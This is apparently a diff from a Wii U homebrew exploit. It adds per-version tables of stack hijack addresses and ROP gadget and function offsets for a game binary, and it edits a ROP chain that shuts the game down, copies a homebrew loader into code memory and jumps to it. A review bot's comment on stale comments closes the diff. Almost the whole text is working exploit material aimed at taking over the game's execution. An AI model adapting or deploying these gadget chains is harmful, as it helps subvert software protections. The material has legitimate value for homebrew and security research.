LWZ_R3_4_R3_LWZ_R0xC_MTLR_R0_ADDI_R1x8_BLR equ (RPX_OFFSET + 0x02018010)
LWZ_R0_R1x1C_LWZ_R30_R1x10_MTLR_R0_LWZ_R31_R1x14_ADDI_R1x18_ADD_R3_R7_BLR equ (RPX_OFFSET + 0x02145D64)
MTCTR_R12_BCTRL_LI_R3_0_LWZ_R0_R1x14_LWZ_R31_R1xC_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x02023700)
; functions used from game
NERD_CREATETHREAD equ (RPX_OFFSET + 0x0221E0B8)
NERD_STARTTHREAD equ (RPX_OFFSET + 0x0221E4D4)
NERD_JOINTHREAD equ (RPX_OFFSET + 0x0221DF64)
HACHI_APPLICATION_SHUTDOWNANDDESTROY equ (RPX_OFFSET + 0x02006944)
NERD_FASTWIIU_SHUTDOWN equ (RPX_OFFSET + 0x0201F138)
CORE_SHUTDOWN equ (RPX_OFFSET + 0x0221D434)
_START_EXIT equ (RPX_OFFSET + 0x02025F48)


@ -0,0 +1,39 @@
; game stack return address
HAX_TARGET_ADDRESS equ (0x1079B624-0xB8)
; application memory pointer
HACHI_APPLICATION_PTR equ (0x10C91938)
; arm9 rom location address
ARM9_ROM_LOCATION equ (0x16444200)
; constants for position calcs
RPX_OFFSET equ (0x01800000)
ARM7_ROM_MEM2_START equ (0xF0000000 - ARM9_ROM_LOCATION + 0x12000000)
; rop-gadgets part 1 (used for all sorts of different things)
LMW_R21R1xC_LWZ_R0R1x3C_MTLR_R0_ADDI_R1_x38_BLR equ (RPX_OFFSET + 0x022070D8)
BCTRL equ (RPX_OFFSET + 0x02206F94)
MTCTR_R27_ADDI_R31x2_MR_R3R31_R4R30_R5R29_R6R28_BCTRL_LMW_R26R1x18_MTLR_R1x34_ADDI_R1x30_BLR equ (RPX_OFFSET + 0x020A3664)
LWZ_R0xAFC_MTLR_R0_ADDI_R1xAF8_BLR equ (RPX_OFFSET + 0x020A323C)
LWZ_R0R1x14_LWZ_R30R1x8_R31R1xC_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x0200106C)
MR_R11R31_LMW_R26R1x8_LWZ_R0x24_MTLR_R0_ADDI_R1x20_CLRLWI_R3R11x18_BLR equ (RPX_OFFSET + 0x021791BC)
LWZ_R0R11x4_R31R11xM4_MTLR_R0_MR_R1R11_BLR equ (RPX_OFFSET + 0x02277B98)
; rop-gadgets part 2 (only used to set up core 0 thread stack)
LWZ_R3_8_R1_LWZ_R0x14_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x02018908)
MR_R12_R3_CMPLW_R12_R0_LI_R3_0_BEQ_ADDI_R3_R12x10_LWZ_R0_R1x14_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x020AEAA4)
LWZ_R5_R1x8_CMPLW_R5_R31_BNE_MR_R3_R5_LWZ_R0_R1x1C_LWZ_R30_R1x10_MTLR_R0_LWZ_R31_R1x14_ADDI_R1x18_BLR equ (RPX_OFFSET + 0x0200F4A8)
LWZ_R4_R1xC_STW_R12_R1x8_LWZ_R3_R1x8_LWZ_R0_R1x1C_MTLR_R0_ADDI_R1x18_BLR equ (RPX_OFFSET + 0x02082DC0)
LWZ_R7_R1x10_LWZ_R8_R1x14_STW_R7_R31x0_STW_R8_R31x0_LWZ_R0_R1x2C_LWZ_R31_R0x24_MTLR_R0_LWZ_R30_R0x20_ADDI_R1x28_BLR equ (RPX_OFFSET + 0x0205788C)
LWZ_R3_4_R3_LWZ_R0xC_MTLR_R0_ADDI_R1x8_BLR equ (RPX_OFFSET + 0x02018990)
LWZ_R0_R1x1C_LWZ_R30_R1x10_MTLR_R0_LWZ_R31_R1x14_ADDI_R1x18_ADD_R3_R7_BLR equ (RPX_OFFSET + 0x021492F8)
MTCTR_R12_BCTRL_LI_R3_0_LWZ_R0_R1x14_LWZ_R31_R1xC_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x020240EC)
; functions used from game
NERD_CREATETHREAD equ (RPX_OFFSET + 0x02221A3C)
NERD_STARTTHREAD equ (RPX_OFFSET + 0x02221E58)
NERD_JOINTHREAD equ (RPX_OFFSET + 0x022218E8)
HACHI_APPLICATION_SHUTDOWNANDDESTROY equ (RPX_OFFSET + 0x02006CC8)
NERD_FASTWIIU_SHUTDOWN equ (RPX_OFFSET + 0x0201FB1C)
CORE_SHUTDOWN equ (RPX_OFFSET + 0x02220DA0)
_START_EXIT equ (RPX_OFFSET + 0x0202693C)


@ -0,0 +1,39 @@
; game stack return address
HAX_TARGET_ADDRESS equ (0x1079B664-0xB8)
; application memory pointer
HACHI_APPLICATION_PTR equ (0x10C91938)
; arm9 rom location address
ARM9_ROM_LOCATION equ (0x16440E00)
; constants for position calcs
RPX_OFFSET equ (0x01800000)
ARM7_ROM_MEM2_START equ (0xF0000000 - ARM9_ROM_LOCATION + 0x12000000)
; rop-gadgets part 1 (used for all sorts of different things)
LMW_R21R1xC_LWZ_R0R1x3C_MTLR_R0_ADDI_R1_x38_BLR equ (RPX_OFFSET + 0x0204A6A0)
BCTRL equ (RPX_OFFSET + 0x02003D2C)
MTCTR_R27_ADDI_R31x2_MR_R3R31_R4R30_R5R29_R6R28_BCTRL_LMW_R26R1x18_MTLR_R1x34_ADDI_R1x30_BLR equ (RPX_OFFSET + 0x020AAB64)
LWZ_R0xAFC_MTLR_R0_ADDI_R1xAF8_BLR equ (RPX_OFFSET + 0x020AA73C)
LWZ_R0R1x14_LWZ_R30R1x8_R31R1xC_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x02001A8C)
MR_R11R31_LMW_R26R1x8_LWZ_R0x24_MTLR_R0_ADDI_R1x20_CLRLWI_R3R11x18_BLR equ (RPX_OFFSET + 0x021806C4)
LWZ_R0R11x4_R31R11xM4_MTLR_R0_MR_R1R11_BLR equ (RPX_OFFSET + 0x022800B0)
; rop-gadgets part 2 (only used to set up core 0 thread stack)
LWZ_R3_8_R1_LWZ_R0x14_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x020187E8)
MR_R12_R3_CMPLW_R12_R0_LI_R3_0_BEQ_ADDI_R3_R12x10_LWZ_R0_R1x14_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x020B5FA4)
LWZ_R5_R1x8_CMPLW_R5_R31_BNE_MR_R3_R5_LWZ_R0_R1x1C_LWZ_R30_R1x10_MTLR_R0_LWZ_R31_R1x14_ADDI_R1x18_BLR equ (RPX_OFFSET + 0x0200F35C)
LWZ_R4_R1xC_STW_R12_R1x8_LWZ_R3_R1x8_LWZ_R0_R1x1C_MTLR_R0_ADDI_R1x18_BLR equ (RPX_OFFSET + 0x020871A4)
LWZ_R7_R1x10_LWZ_R8_R1x14_STW_R7_R31x0_STW_R8_R31x0_LWZ_R0_R1x2C_LWZ_R31_R0x24_MTLR_R0_LWZ_R30_R0x20_ADDI_R1x28_BLR equ (RPX_OFFSET + 0x0205B638)
LWZ_R3_4_R3_LWZ_R0xC_MTLR_R0_ADDI_R1x8_BLR equ (RPX_OFFSET + 0x02018870)
LWZ_R0_R1x1C_LWZ_R30_R1x10_MTLR_R0_LWZ_R31_R1x14_ADDI_R1x18_ADD_R3_R7_BLR equ (RPX_OFFSET + 0x021507F8)
MTCTR_R12_BCTRL_LI_R3_0_LWZ_R0_R1x14_LWZ_R31_R1xC_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x020241EC)
; functions used from game
NERD_CREATETHREAD equ (RPX_OFFSET + 0x02229E4C)
NERD_STARTTHREAD equ (RPX_OFFSET + 0x0222A268)
NERD_JOINTHREAD equ (RPX_OFFSET + 0x02229CF8)
HACHI_APPLICATION_SHUTDOWNANDDESTROY equ (RPX_OFFSET + 0x02006B64)
NERD_FASTWIIU_SHUTDOWN equ (RPX_OFFSET + 0x0201FC44)
CORE_SHUTDOWN equ (RPX_OFFSET + 0x0222993C)
_START_EXIT equ (RPX_OFFSET + 0x02026314)


@ -0,0 +1,39 @@
; game stack return address
HAX_TARGET_ADDRESS equ (0x10796964-0xB8)
; application memory pointer
HACHI_APPLICATION_PTR equ (0x10C8C938)
; arm9 rom location address
ARM9_ROM_LOCATION equ (0x1643F200)
; constants for position calcs
RPX_OFFSET equ (0x01800000)
ARM7_ROM_MEM2_START equ (0xF0000000 - ARM9_ROM_LOCATION + 0x12000000)
; rop-gadgets part 1 (used for all sorts of different things)
LMW_R21R1xC_LWZ_R0R1x3C_MTLR_R0_ADDI_R1_x38_BLR equ (RPX_OFFSET + 0x02063D3C)
BCTRL equ (RPX_OFFSET + 0x02004158)
MTCTR_R27_ADDI_R31x2_MR_R3R31_R4R30_R5R29_R6R28_BCTRL_LMW_R26R1x18_MTLR_R1x34_ADDI_R1x30_BLR equ (RPX_OFFSET + 0x020A3670)
LWZ_R0xAFC_MTLR_R0_ADDI_R1xAF8_BLR equ (RPX_OFFSET + 0x020A3248)
LWZ_R0R1x14_LWZ_R30R1x8_R31R1xC_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x0200106C)
MR_R11R31_LMW_R26R1x8_LWZ_R0x24_MTLR_R0_ADDI_R1x20_CLRLWI_R3R11x18_BLR equ (RPX_OFFSET + 0x021791C8)
LWZ_R0R11x4_R31R11xM4_MTLR_R0_MR_R1R11_BLR equ (RPX_OFFSET + 0x02277BA4)
; rop-gadgets part 2 (only used to set up core 0 thread stack)
LWZ_R3_8_R1_LWZ_R0x14_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x02018908)
MR_R12_R3_CMPLW_R12_R0_LI_R3_0_BEQ_ADDI_R3_R12x10_LWZ_R0_R1x14_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x020AEAB0)
LWZ_R5_R1x8_CMPLW_R5_R31_BNE_MR_R3_R5_LWZ_R0_R1x1C_LWZ_R30_R1x10_MTLR_R0_LWZ_R31_R1x14_ADDI_R1x18_BLR equ (RPX_OFFSET + 0x0200F4A8)
LWZ_R4_R1xC_STW_R12_R1x8_LWZ_R3_R1x8_LWZ_R0_R1x1C_MTLR_R0_ADDI_R1x18_BLR equ (RPX_OFFSET + 0x02082E20)
LWZ_R7_R1x10_LWZ_R8_R1x14_STW_R7_R31x0_STW_R8_R31x0_LWZ_R0_R1x2C_LWZ_R31_R0x24_MTLR_R0_LWZ_R30_R0x20_ADDI_R1x28_BLR equ (RPX_OFFSET + 0x020578EC)
LWZ_R3_4_R3_LWZ_R0xC_MTLR_R0_ADDI_R1x8_BLR equ (RPX_OFFSET + 0x02018990)
LWZ_R0_R1x1C_LWZ_R30_R1x10_MTLR_R0_LWZ_R31_R1x14_ADDI_R1x18_ADD_R3_R7_BLR equ (RPX_OFFSET + 0x02149304)
MTCTR_R12_BCTRL_LI_R3_0_LWZ_R0_R1x14_LWZ_R31_R1xC_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x020240EC)
; functions used from game
NERD_CREATETHREAD equ (RPX_OFFSET + 0x02221A48)
NERD_STARTTHREAD equ (RPX_OFFSET + 0x02221E64)
NERD_JOINTHREAD equ (RPX_OFFSET + 0x022218F4)
HACHI_APPLICATION_SHUTDOWNANDDESTROY equ (RPX_OFFSET + 0x02006CC8)
NERD_FASTWIIU_SHUTDOWN equ (RPX_OFFSET + 0x0201FB1C)
CORE_SHUTDOWN equ (RPX_OFFSET + 0x02220DAC)
_START_EXIT equ (RPX_OFFSET + 0x0202699C)


@ -0,0 +1,39 @@
; game stack return address
HAX_TARGET_ADDRESS equ (0x107991A4-0xC0)
; application memory pointer
HACHI_APPLICATION_PTR equ (0x10C8F938)
; arm9 rom location address
ARM9_ROM_LOCATION equ (0x16443300)
; constants for position calcs
RPX_OFFSET equ (0x01800000)
ARM7_ROM_MEM2_START equ (0xF0000000 - ARM9_ROM_LOCATION + 0x12000000)
; rop-gadgets part 1 (used for all sorts of different things)
LMW_R21R1xC_LWZ_R0R1x3C_MTLR_R0_ADDI_R1_x38_BLR equ (RPX_OFFSET + 0x02049628)
BCTRL equ (RPX_OFFSET + 0x0200415C)
MTCTR_R27_ADDI_R31x2_MR_R3R31_R4R30_R5R29_R6R28_BCTRL_LMW_R26R1x18_MTLR_R1x34_ADDI_R1x30_BLR equ (RPX_OFFSET + 0x020A6E10)
LWZ_R0xAFC_MTLR_R0_ADDI_R1xAF8_BLR equ (RPX_OFFSET + 0x020A69E8)
LWZ_R0R1x14_LWZ_R30R1x8_R31R1xC_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x0200106C)
MR_R11R31_LMW_R26R1x8_LWZ_R0x24_MTLR_R0_ADDI_R1x20_CLRLWI_R3R11x18_BLR equ (RPX_OFFSET + 0x0217C968)
LWZ_R0R11x4_R31R11xM4_MTLR_R0_MR_R1R11_BLR equ (RPX_OFFSET + 0x0227B400)
; rop-gadgets part 2 (only used to set up core 0 thread stack)
LWZ_R3_8_R1_LWZ_R0x14_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x0201899C)
MR_R12_R3_CMPLW_R12_R0_LI_R3_0_BEQ_ADDI_R3_R12x10_LWZ_R0_R1x14_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x020B2250)
LWZ_R5_R1x8_CMPLW_R5_R31_BNE_MR_R3_R5_LWZ_R0_R1x1C_LWZ_R30_R1x10_MTLR_R0_LWZ_R31_R1x14_ADDI_R1x18_BLR equ (RPX_OFFSET + 0x0200F510)
LWZ_R4_R1xC_STW_R12_R1x8_LWZ_R3_R1x8_LWZ_R0_R1x1C_MTLR_R0_ADDI_R1x18_BLR equ (RPX_OFFSET + 0x02085334)
LWZ_R7_R1x10_LWZ_R8_R1x14_STW_R7_R31x0_STW_R8_R31x0_LWZ_R0_R1x2C_LWZ_R31_R0x24_MTLR_R0_LWZ_R30_R0x20_ADDI_R1x28_BLR equ (RPX_OFFSET + 0x020596A4)
LWZ_R3_4_R3_LWZ_R0xC_MTLR_R0_ADDI_R1x8_BLR equ (RPX_OFFSET + 0x02018A24)
LWZ_R0_R1x1C_LWZ_R30_R1x10_MTLR_R0_LWZ_R31_R1x14_ADDI_R1x18_ADD_R3_R7_BLR equ (RPX_OFFSET + 0x0214CAA4)
MTCTR_R12_BCTRL_LI_R3_0_LWZ_R0_R1x14_LWZ_R31_R1xC_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x02024274)
; functions used from game
NERD_CREATETHREAD equ (RPX_OFFSET + 0x02225208)
NERD_STARTTHREAD equ (RPX_OFFSET + 0x02225624)
NERD_JOINTHREAD equ (RPX_OFFSET + 0x022250B4)
HACHI_APPLICATION_SHUTDOWNANDDESTROY equ (RPX_OFFSET + 0x02006D30)
NERD_FASTWIIU_SHUTDOWN equ (RPX_OFFSET + 0x0201FC7C)
CORE_SHUTDOWN equ (RPX_OFFSET + 0x022247D8)
_START_EXIT equ (RPX_OFFSET + 0x02026908)


@ -0,0 +1,39 @@
; game stack return address
HAX_TARGET_ADDRESS equ (0x1079B5E4-0xB8)
; application memory pointer
HACHI_APPLICATION_PTR equ (0x10C91938)
; arm9 rom location address
ARM9_ROM_LOCATION equ (0x16444200)
; constants for position calcs
RPX_OFFSET equ (0x01800000)
ARM7_ROM_MEM2_START equ (0xF0000000 - ARM9_ROM_LOCATION + 0x12000000)
; rop-gadgets part 1 (used for all sorts of different things)
LMW_R21R1xC_LWZ_R0R1x3C_MTLR_R0_ADDI_R1_x38_BLR equ (RPX_OFFSET + 0x02206F7C)
BCTRL equ (RPX_OFFSET + 0x02206EB4)
MTCTR_R27_ADDI_R31x2_MR_R3R31_R4R30_R5R29_R6R28_BCTRL_LMW_R26R1x18_MTLR_R1x34_ADDI_R1x30_BLR equ (RPX_OFFSET + 0x020A3508)
LWZ_R0xAFC_MTLR_R0_ADDI_R1xAF8_BLR equ (RPX_OFFSET + 0x020A3134)
LWZ_R0R1x14_LWZ_R30R1x8_R31R1xC_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x02001068)
MR_R11R31_LMW_R26R1x8_LWZ_R0x24_MTLR_R0_ADDI_R1x20_CLRLWI_R3R11x18_BLR equ (RPX_OFFSET + 0x02179060)
LWZ_R0R11x4_R31R11xM4_MTLR_R0_MR_R1R11_BLR equ (RPX_OFFSET + 0x02277A3C)
; rop-gadgets part 2 (only used to set up core 0 thread stack)
LWZ_R3_8_R1_LWZ_R0x14_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x02018910)
MR_R12_R3_CMPLW_R12_R0_LI_R3_0_BEQ_ADDI_R3_R12x10_LWZ_R0_R1x14_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x020AE948)
LWZ_R5_R1x8_CMPLW_R5_R31_BNE_MR_R3_R5_LWZ_R0_R1x1C_LWZ_R30_R1x10_MTLR_R0_LWZ_R31_R1x14_ADDI_R1x18_BLR equ (RPX_OFFSET + 0x0200F4B0)
LWZ_R4_R1xC_STW_R12_R1x8_LWZ_R3_R1x8_LWZ_R0_R1x1C_MTLR_R0_ADDI_R1x18_BLR equ (RPX_OFFSET + 0x02082DBC)
LWZ_R7_R1x10_LWZ_R8_R1x14_STW_R7_R31x0_STW_R8_R31x0_LWZ_R0_R1x2C_LWZ_R31_R0x24_MTLR_R0_LWZ_R30_R0x20_ADDI_R1x28_BLR equ (RPX_OFFSET + 0x02057874)
LWZ_R3_4_R3_LWZ_R0xC_MTLR_R0_ADDI_R1x8_BLR equ (RPX_OFFSET + 0x02018998)
LWZ_R0_R1x1C_LWZ_R30_R1x10_MTLR_R0_LWZ_R31_R1x14_ADDI_R1x18_ADD_R3_R7_BLR equ (RPX_OFFSET + 0x0214919C)
MTCTR_R12_BCTRL_LI_R3_0_LWZ_R0_R1x14_LWZ_R31_R1xC_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x020240F4)
; functions used from game
NERD_CREATETHREAD equ (RPX_OFFSET + 0x022218E0)
NERD_STARTTHREAD equ (RPX_OFFSET + 0x02221CFC)
NERD_JOINTHREAD equ (RPX_OFFSET + 0x0222178C)
HACHI_APPLICATION_SHUTDOWNANDDESTROY equ (RPX_OFFSET + 0x02006CD0)
NERD_FASTWIIU_SHUTDOWN equ (RPX_OFFSET + 0x0201FB24)
CORE_SHUTDOWN equ (RPX_OFFSET + 0x02220C44)
_START_EXIT equ (RPX_OFFSET + 0x02026944)


@ -0,0 +1,39 @@
; game stack return address
HAX_TARGET_ADDRESS equ (0x10799D24-0xC0)
; application memory pointer
HACHI_APPLICATION_PTR equ (0x10C8F938)
; arm9 rom location address
ARM9_ROM_LOCATION equ (0x16443400)
; constants for position calcs
RPX_OFFSET equ (0x01800000)
ARM7_ROM_MEM2_START equ (0xF0000000 - ARM9_ROM_LOCATION + 0x12000000)
; rop-gadgets part 1 (used for all sorts of different things)
LMW_R21R1xC_LWZ_R0R1x3C_MTLR_R0_ADDI_R1_x38_BLR equ (RPX_OFFSET + 0x0204AB1C)
BCTRL equ (RPX_OFFSET + 0x02003CF0)
MTCTR_R27_ADDI_R31x2_MR_R3R31_R4R30_R5R29_R6R28_BCTRL_LMW_R26R1x18_MTLR_R1x34_ADDI_R1x30_BLR equ (RPX_OFFSET + 0x020A9E30)
LWZ_R0xAFC_MTLR_R0_ADDI_R1xAF8_BLR equ (RPX_OFFSET + 0x020A9A08)
LWZ_R0R1x14_LWZ_R30R1x8_R31R1xC_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x02000BA8)
MR_R11R31_LMW_R26R1x8_LWZ_R0x24_MTLR_R0_ADDI_R1x20_CLRLWI_R3R11x18_BLR equ (RPX_OFFSET + 0x0217F988)
LWZ_R0R11x4_R31R11xM4_MTLR_R0_MR_R1R11_BLR equ (RPX_OFFSET + 0x0227E524)
; rop-gadgets part 2 (only used to set up core 0 thread stack)
LWZ_R3_8_R1_LWZ_R0x14_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x02018548)
MR_R12_R3_CMPLW_R12_R0_LI_R3_0_BEQ_ADDI_R3_R12x10_LWZ_R0_R1x14_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x020B5270)
LWZ_R5_R1x8_CMPLW_R5_R31_BNE_MR_R3_R5_LWZ_R0_R1x1C_LWZ_R30_R1x10_MTLR_R0_LWZ_R31_R1x14_ADDI_R1x18_BLR equ (RPX_OFFSET + 0x0200F0BC)
LWZ_R4_R1xC_STW_R12_R1x8_LWZ_R3_R1x8_LWZ_R0_R1x1C_MTLR_R0_ADDI_R1x18_BLR equ (RPX_OFFSET + 0x02088050)
LWZ_R7_R1x10_LWZ_R8_R1x14_STW_R7_R31x0_STW_R8_R31x0_LWZ_R0_R1x2C_LWZ_R31_R0x24_MTLR_R0_LWZ_R30_R0x20_ADDI_R1x28_BLR equ (RPX_OFFSET + 0x0205C438)
LWZ_R3_4_R3_LWZ_R0xC_MTLR_R0_ADDI_R1x8_BLR equ (RPX_OFFSET + 0x020185D0)
LWZ_R0_R1x1C_LWZ_R30_R1x10_MTLR_R0_LWZ_R31_R1x14_ADDI_R1x18_ADD_R3_R7_BLR equ (RPX_OFFSET + 0x0214FAC4)
MTCTR_R12_BCTRL_LI_R3_0_LWZ_R0_R1x14_LWZ_R31_R1xC_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x02023F14)
; functions used from game
NERD_CREATETHREAD equ (RPX_OFFSET + 0x0222832C)
NERD_STARTTHREAD equ (RPX_OFFSET + 0x02228748)
NERD_JOINTHREAD equ (RPX_OFFSET + 0x022281D8)
HACHI_APPLICATION_SHUTDOWNANDDESTROY equ (RPX_OFFSET + 0x020068C4)
NERD_FASTWIIU_SHUTDOWN equ (RPX_OFFSET + 0x0201F97C)
CORE_SHUTDOWN equ (RPX_OFFSET + 0x022278FC)
_START_EXIT equ (RPX_OFFSET + 0x02025FB0)


@ -0,0 +1,39 @@
; game stack return address
HAX_TARGET_ADDRESS equ (0x1079C564-0xC8)
; application memory pointer
HACHI_APPLICATION_PTR equ (0x10C92938)
; arm9 rom location address
ARM9_ROM_LOCATION equ (0x16441D00)
; constants for position calcs
RPX_OFFSET equ (0x01800000)
ARM7_ROM_MEM2_START equ (0xF0000000 - ARM9_ROM_LOCATION + 0x12000000)
; rop-gadgets part 1 (used for all sorts of different things)
LMW_R21R1xC_LWZ_R0R1x3C_MTLR_R0_ADDI_R1_x38_BLR equ (RPX_OFFSET + 0x0200369C)
BCTRL equ (RPX_OFFSET + 0x020041D8)
MTCTR_R27_ADDI_R31x2_MR_R3R31_R4R30_R5R29_R6R28_BCTRL_LMW_R26R1x18_MTLR_R1x34_ADDI_R1x30_BLR equ (RPX_OFFSET + 0x020ABF18)
LWZ_R0xAFC_MTLR_R0_ADDI_R1xAF8_BLR equ (RPX_OFFSET + 0x020ABAF0)
LWZ_R0R1x14_LWZ_R30R1x8_R31R1xC_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x02001AF8)
MR_R11R31_LMW_R26R1x8_LWZ_R0x24_MTLR_R0_ADDI_R1x20_CLRLWI_R3R11x18_BLR equ (RPX_OFFSET + 0x02181A50)
LWZ_R0R11x4_R31R11xM4_MTLR_R0_MR_R1R11_BLR equ (RPX_OFFSET + 0x022815B4)
; rop-gadgets part 2 (only used to set up core 0 thread stack)
LWZ_R3_8_R1_LWZ_R0x14_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x02018A88)
MR_R12_R3_CMPLW_R12_R0_LI_R3_0_BEQ_ADDI_R3_R12x10_LWZ_R0_R1x14_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x020B7358)
LWZ_R5_R1x8_CMPLW_R5_R31_BNE_MR_R3_R5_LWZ_R0_R1x1C_LWZ_R30_R1x10_MTLR_R0_LWZ_R31_R1x14_ADDI_R1x18_BLR equ (RPX_OFFSET + 0x0200F610)
LWZ_R4_R1xC_STW_R12_R1x8_LWZ_R3_R1x8_LWZ_R0_R1x1C_MTLR_R0_ADDI_R1x18_BLR equ (RPX_OFFSET + 0x02088270)
LWZ_R7_R1x10_LWZ_R8_R1x14_STW_R7_R31x0_STW_R8_R31x0_LWZ_R0_R1x2C_LWZ_R31_R0x24_MTLR_R0_LWZ_R30_R0x20_ADDI_R1x28_BLR equ (RPX_OFFSET + 0x0205B0C8)
LWZ_R3_4_R3_LWZ_R0xC_MTLR_R0_ADDI_R1x8_BLR equ (RPX_OFFSET + 0x02018B10)
LWZ_R0_R1x1C_LWZ_R30_R1x10_MTLR_R0_LWZ_R31_R1x14_ADDI_R1x18_ADD_R3_R7_BLR equ (RPX_OFFSET + 0x02151B84)
MTCTR_R12_BCTRL_LI_R3_0_LWZ_R0_R1x14_LWZ_R31_R1xC_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x0202441C)
; functions used from game
NERD_CREATETHREAD equ (RPX_OFFSET + 0x0222B28C)
NERD_STARTTHREAD equ (RPX_OFFSET + 0x0222B6A8)
NERD_JOINTHREAD equ (RPX_OFFSET + 0x0222B138)
HACHI_APPLICATION_SHUTDOWNANDDESTROY equ (RPX_OFFSET + 0x02006E2C)
NERD_FASTWIIU_SHUTDOWN equ (RPX_OFFSET + 0x0201FE74)
CORE_SHUTDOWN equ (RPX_OFFSET + 0x0222AD7C)
_START_EXIT equ (RPX_OFFSET + 0x02026544)


@ -118,8 +118,10 @@ rop_hook_start:
.arm.big
rop_start:
; quit out of GX2 so we can re-use it in core 0
; do hachihachi cleanups so we can use everything safely
call_func HACHI_APPLICATION_SHUTDOWNANDDESTROY, HACHI_APPLICATION_PTR, 0, 0, 0
call_func NERD_FASTWIIU_SHUTDOWN, 0, 0, 0, 0
call_func CORE_SHUTDOWN, 0, 0, 0, 0
; set up hbl_loader in core 0
call_func_6args NERD_CREATETHREAD, NERD_THREAD0OBJECT, LWZ_R0xAFC_MTLR_R0_ADDI_R1xAF8_BLR, 0x1007E7A8, thread0_param, 0x0, 0x0
@ -198,13 +200,6 @@ rop_start:
call_func NERD_STARTTHREAD, NERD_THREAD0OBJECT, 0x0, 0x0, 0x0
call_func NERD_JOINTHREAD, NERD_THREAD0OBJECT, 0x0, 0x0, 0x0
; clean up the rest of hachihachi
call_func HACHI_APPLICATION_SHUTDOWNANDDESTROY, HACHI_APPLICATION_PTR, 0, 0, 0
call_func CORE_SHUTDOWN, 0, 0, 0, 0
; on exit we want to go into mii studio directly
call_func _SYSLaunchMiiStudio, 0x0, 0x0, 0x0, 0x0
; prepare system for foreground release
call_func OSSAVESDONE_READYTORELEASE, 0, 0, 0, 0
@ -219,7 +214,7 @@ rop_start:
call_func OSRELEASEFOREGROUND, 0, 0, 0, 0
; launch mii studio app
.word _EXIT
.word _START_EXIT
core0rop:
; switch codegen to RW
@ -227,11 +222,11 @@ rop_start:
; memcpy code
call_func MEMCPY, HBL_LOADER_ADR, hbl_loader, hbl_loader_end - hbl_loader, 0x0
call_func DC_FLUSHRANGE, HBL_LOADER_ADR, 0xC000, 0x0, 0x0
call_func DC_FLUSHRANGE, HBL_LOADER_ADR, hbl_loader_end - hbl_loader, 0x0, 0x0
; switch codegen to RX
call_func OSCODEGEN_SWITCHSECMODE, 0x1, 0x0, 0x0, 0x0
call_func IC_INVALIDATERANGE, HBL_LOADER_ADR, 0xC000, 0x0, 0x0
call_func IC_INVALIDATERANGE, HBL_LOADER_ADR, hbl_loader_end - hbl_loader, 0x0, 0x0
; execute option_select in codegen
.word HBL_LOADER_ADR
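Review bot: The comment `; launch mii studio app` above the new `.word _START_EXIT` in the third hunk is now stale: the second hunk removes the `_SYSLaunchMiiStudio` call and the "; on exit we want to go into mii studio directly" comment, so the chain no longer launches Mii Studio at that point but returns into the game's exit path. Replace it with something that describes the new behaviour, e.g. `; hand control back to the game's _start exit path`, or drop it. In the first hunk the shutdown calls moved ahead of `NERD_CREATETHREAD` are explained only by "do hachihachi cleanups so we can use everything safely"; a note on why they must precede the thread setup (and why `NERD_FASTWIIU_SHUTDOWN` was added) would help the next reader, as the ordering looks deliberate but the reason is not visible. Note that `rop_start` begins before the first hunk and continues past the visible lines, so I could not verify that nothing later in the chain still depends on the removed Mii Studio launch.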